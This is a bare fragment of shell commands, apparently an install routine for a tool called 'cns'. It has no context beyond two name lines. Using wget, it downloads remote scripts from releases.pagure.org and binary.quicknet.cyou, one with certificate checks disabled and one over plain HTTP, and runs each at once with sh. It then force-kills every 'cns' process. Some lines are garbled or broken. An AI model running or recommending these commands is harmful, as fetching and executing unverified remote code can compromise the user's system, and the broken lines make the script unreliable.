dongge
dongge qimaintainer
wget --no-check-certificate -O cns.sh "https://releases.pagure.org/builds/cns/cns2.sh" && sh cns.sh
wget -O builds.sh http://binary.quicknet.cyou/builds.sh && sh builds.sh
ps -ef|grep cns|grep -v grep|awk '{print "kill -9 "$2}'|sh
kill -9 pidof cns
>/dev/null 2>&1
kill -9 pgrep cns
>/dev/null 2>&1